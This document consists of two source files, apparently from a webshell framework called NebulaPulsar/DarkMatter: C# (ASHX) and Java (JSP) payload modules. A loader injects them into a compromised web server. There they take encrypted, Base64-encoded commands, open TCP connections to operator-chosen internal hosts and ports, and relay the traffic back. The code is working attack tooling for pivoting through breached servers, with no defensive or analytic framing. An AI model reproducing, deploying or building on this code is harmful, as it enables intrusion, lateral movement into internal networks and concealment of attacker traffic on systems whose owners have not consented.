File: Payload/ASHX/NebulaPulsar/DarkMatter/proxy.cs
using System;
using System.Web;
using System.IO;
using System.Diagnostics;
using System.Text;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Threading;
using System.Net.Sockets;
using System.Net;

public class proxy
{
    private Dictionary<string, string> fnParseParams(string szParam)
    {
        Dictionary<string, string> dic = new Dictionary<string, string>();
        if (string.IsNullOrEmpty(szParam))
            return dic;

        string[] pairs = szParam.Split('&');
        foreach (string szPair in pairs)
        {
            int nIdx = szPair.IndexOf("=");
            if (nIdx > 0)
                dic[szPair.Substring(0, nIdx).Trim()] = szPair.Substring(nIdx + 1).Trim();
        }

        return dic;
    }

    private string fnB64Encode(string szInput) => Convert.ToBase64String(Encoding.UTF8.GetBytes(szInput));
    private string fnB64Decode(string szInput) => Encoding.UTF8.GetString(Convert.FromBase64String(szInput));

    private void fnWriteOutput(object driver, HttpResponse response, byte[] abOutput)
    {
        var cryptMethod = driver.GetType().GetMethod("Crypt", new Type[] { typeof(byte[]), typeof(int) });
        byte[] abEncryptedResp = (byte[])cryptMethod.Invoke(driver, new object[] { abOutput, 1 });

        response.Clear();
        response.ContentType = "application/octet-stream";
        response.BinaryWrite(abEncryptedResp);
    }

    public bool Run()
    {
        HttpContext context = HttpContext.Current;
        if (context == null)
            return false;

        HttpRequest request = context.Request;
        HttpResponse response = context.Response;

        try
        {
            byte[] abPayload = (byte[])context.Items["payload"];
            object driver = context.Items["driver"];
            int nDllLength = (int)context.Items["len"];

            int nParamOffset = nDllLength + 4;
            int nParamLength = abPayload.Length - nParamOffset;
            string szParam = Encoding.UTF8.GetString(abPayload, nParamOffset, nParamLength).Trim();

            Dictionary<string, string> dic = fnParseParams(szParam);
            
            if (!dic.ContainsKey("z0") || !dic.ContainsKey("z2") || !dic.ContainsKey("z3"))
            {
                fnWriteOutput(driver, response, Encoding.UTF8.GetBytes("{\"status\":\"error\",\"msg\":\"Missing parameters\"}"));
                return true;
            }

            string action = fnB64Decode(dic["z0"]).Trim();
            string targetIp = fnB64Decode(dic["z2"]).Trim();
            string targetPortStr = fnB64Decode(dic["z3"]).Trim();
            int targetPort = int.Parse(targetPortStr);

            string szResponseResult = "";

            if (action == "forward")
            {
                TcpClient tcpClient = null;
                try
                {
                    tcpClient = new TcpClient();
                    
                    var connectResult = tcpClient.BeginConnect(targetIp, targetPort, null, null);
                    var success = connectResult.AsyncWaitHandle.WaitOne(TimeSpan.FromSeconds(3));
                    
                    if (!success)
                    {
                        throw new Exception("Connect timeout");
                    }
                    tcpClient.EndConnect(connectResult);

                    NetworkStream stream = tcpClient.GetStream();
                    stream.ReadTimeout = 1500;

                    if (dic.ContainsKey("z4") && !string.IsNullOrEmpty(dic["z4"]))
                    {
                        byte[] firstDecode = Convert.FromBase64String(dic["z4"]);
                        byte[] forwardData = Convert.FromBase64String(Encoding.UTF8.GetString(firstDecode));
                        if (forwardData.Length > 0)
                        {
                            stream.Write(forwardData, 0, forwardData.Length);
                            stream.Flush();
                        }
                    }

                    MemoryStream ms = new MemoryStream();
                    byte[] buffer = new byte[8192];
                    int retry = 0;

                    while (retry < 3)
                    {
                        Thread.Sleep(50);
                        if (tcpClient.Available > 0)
                        {
                            while (tcpClient.Available > 0)
                            {
                                int bytesRead = stream.Read(buffer, 0, buffer.Length);
                                if (bytesRead > 0)
                                {
                                    ms.Write(buffer, 0, bytesRead);
                                }
                            }
                        }

                        if (ms.Length > 0)
                        {
                            break;
                        }
                        retry++;
                    }

                    byte[] responseData = ms.ToArray();
                    string base64Response = Convert.ToBase64String(responseData);

                    szResponseResult = "{\"status\":\"success\",\"data\":\"" + base64Response + "\"}";
                }
                catch (Exception)
                {
                    szResponseResult = "{\"status\":\"error\",\"msg\":\"Connect failed\"}";
                }
                finally
                {
                    if (tcpClient != null)
                    {
                        tcpClient.Close();
                    }
                }
            }
            else
            {
                szResponseResult = "{\"status\":\"error\",\"msg\":\"Unknown action\"}";
            }

            fnWriteOutput(driver, response, Encoding.UTF8.GetBytes(szResponseResult));
        }
        catch (Exception ex)
        {
            response.Write("DARKMATTER_ERROR: " + ex.Message);
        }

        return true;
    }
}

File: Payload/JSP/NebulaPulsar(Java 8)/proxy.java
import java.io.*;
import java.lang.reflect.Method;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.nio.charset.StandardCharsets;

public class proxy extends ClassLoader
{
    public proxy(ClassLoader objParent) { super(objParent); }
    public proxy() { super(proxy.class.getClassLoader()); }

    private Map<String, String> fnParseParams(String szParamStr)
    {
        Map<String, String> mapParams = new HashMap<String, String>();
        if (szParamStr == null || szParamStr.trim().isEmpty())
            return mapParams;

        String[] aszPairs = szParamStr.split("&");
        for (String szPair : aszPairs)
        {
            int nIdx = szPair.indexOf("=");
            if (nIdx > 0)
            {
                mapParams.put(szPair.substring(0, nIdx), szPair.substring(nIdx + 1));
            }
        }
        return mapParams;
    }

    private void fnWriteOutput(Object objParam, Object objResponse, OutputStream osClient, byte[] abResult)
    {
        if (abResult.length == 0)
            abResult = "DARKMATTER_SUCCESS: Action executed but returned no output".getBytes();

        Object objPageContext = objParam;

        try
        {
            byte[] abEncryptedResult = Encrypt(objParam, abResult);
            osClient.write(abEncryptedResult);
            osClient.flush();

            Method fnSetStatus = objResponse.getClass().getMethod("setStatus", new Class[]{int.class});
            fnSetStatus.invoke(objResponse, new Object[]{200});

            try
            {
                Method fnGetOut = objPageContext.getClass().getMethod("getOut", new Class[0]);
                Object objOut = fnGetOut.invoke(objPageContext, new Object[0]);
                Method fnClear = objOut.getClass().getMethod("clear", new Class[0]);
                fnClear.invoke(objOut, new Object[0]);
            }
            catch (Exception exIgnored) {}

            Method fnFlushBuffer = objResponse.getClass().getMethod("flushBuffer", new Class[0]);
            fnFlushBuffer.invoke(objResponse, new Object[0]);
        }
        catch (Exception exIgnored) {}
    }

    private byte[] Encrypt(Object objPageContext, byte[] abRawResponse)
    {
        try
        {
            if (objPageContext == null)
                return abRawResponse;

            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            Object objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPulsarLoader = fnGetAttribute.invoke(objRequest, new Object[]{"pulsar_loader_instance"});
            
            if (objPulsarLoader == null)
                return abRawResponse;

            java.lang.reflect.Method fnCrypt = objPulsarLoader.getClass().getDeclaredMethod("Crypt", byte[].class, int.class);
            fnCrypt.setAccessible(true);

            return (byte[])fnCrypt.invoke(objPulsarLoader, abRawResponse, 1);
        }
        catch (Exception exCrashed)
        {
            return abRawResponse;
        }
    }

    @Override
    public boolean equals(Object objParam)
    {
        Object objPageContext = objParam;
        Object objRequest = null;
        Object objResponse = null;
        OutputStream osClient = null;
        
        try
        {
            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetResponse = objPageContext.getClass().getMethod("getResponse", new Class[0]);
            objResponse = fnGetResponse.invoke(objPageContext, new Object[0]);

            Method fnGetOutputStream = objResponse.getClass().getMethod("getOutputStream", new Class[0]);
            osClient = (OutputStream) fnGetOutputStream.invoke(objResponse, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPayload = fnGetAttribute.invoke(objRequest, new Object[]{"payload"});
            Object objLength = fnGetAttribute.invoke(objRequest, new Object[]{"len"});

            if (objPayload == null || objLength == null)
            {
                osClient.write("PAYLOAD_ERROR: Missing attributes from request.".getBytes());
                return true;
            }

            byte[] abPayload = (byte[])objPayload;
            int nClassLength = Integer.parseInt(objLength.toString());
            int nParamOffset = nClassLength + 4;
            int nParamLength = abPayload.length - nParamOffset;
            String szParam = new String(abPayload, nParamOffset, nParamLength, "UTF-8").trim();

            Map<String, String> mapParams = fnParseParams(szParam);
            
            String z0 = mapParams.get("z0");
            String z2 = mapParams.get("z2");
            String z3 = mapParams.get("z3");
            String z4 = mapParams.get("z4");

            if (z0 == null || z2 == null || z3 == null) {
                fnWriteOutput(objParam, objResponse, osClient, "{\"status\":\"error\",\"msg\":\"Missing parameters\"}".getBytes());
                return true;
            }
            
            String action = new String(Base64.getDecoder().decode(z0), StandardCharsets.UTF_8).trim();
            String targetIp = new String(Base64.getDecoder().decode(z2), StandardCharsets.UTF_8).trim();
            String targetPortStr = new String(Base64.getDecoder().decode(z3), StandardCharsets.UTF_8).trim();
            int targetPort = Integer.parseInt(targetPortStr);

            String szResponseResult = "";

            if ("forward".equals(action)) {
                Socket socket = null;
                try {
                    socket = new Socket();
                    socket.connect(new InetSocketAddress(targetIp, targetPort), 3000);
                    
                    socket.setSoTimeout(1500); 

                    OutputStream osRemote = socket.getOutputStream();
                    InputStream isRemote = socket.getInputStream();

                    if (z4 != null && !z4.isEmpty()) {
                        byte[] firstDecode = Base64.getDecoder().decode(z4);
                        byte[] forwardData = Base64.getDecoder().decode(firstDecode);
                        if (forwardData.length > 0) {
                            osRemote.write(forwardData);
                            osRemote.flush();
                        }
                    }

                    ByteArrayOutputStream bos = new ByteArrayOutputStream();
                    byte[] buffer = new byte[8192];
                    int bytesRead = -1;
                    int retry = 0;

                    while (retry < 3) {
                        try {
                            Thread.sleep(50); 
                            
                            if (isRemote.available() > 0) {
                                while (isRemote.available() > 0 && (bytesRead = isRemote.read(buffer)) != -1) {
                                    bos.write(buffer, 0, bytesRead);
                                }
                            }
                            
                            if (bos.size() > 0) {
                                break;
                            }
                        } catch (Exception exSocket) {
                            
                        }
                        retry++;
                    }

                    byte[] responseData = bos.toByteArray();
                    String base64Response = Base64.getEncoder().encodeToString(responseData);
                    
                    szResponseResult = "{\"status\":\"success\",\"data\":\"" + base64Response + "\"}";

                } catch (Exception exConnect) {
                    szResponseResult = "{\"status\":\"error\",\"msg\":\"Connect failed\"}";
                } finally {
                    if (socket != null) {
                        try { socket.close(); } catch (Exception e) {}
                    }
                }
            } else {
                szResponseResult = "{\"status\":\"error\",\"msg\":\"Unknown action\"}";
            }

            fnWriteOutput(objParam, objResponse, osClient, szResponseResult.getBytes(StandardCharsets.UTF_8));
        }
        catch (Exception ex)
        {
            if (osClient != null)
            {
                try
                {
                    StringWriter swTrace = new StringWriter();
                    ex.printStackTrace(new PrintWriter(swTrace));
                    osClient.write(("DARKMATTER_INTERNAL_CRASHED: " + swTrace.toString()).getBytes());
                }
                catch (Exception exIgnored) {}
            }
        }

        return true;
    }
}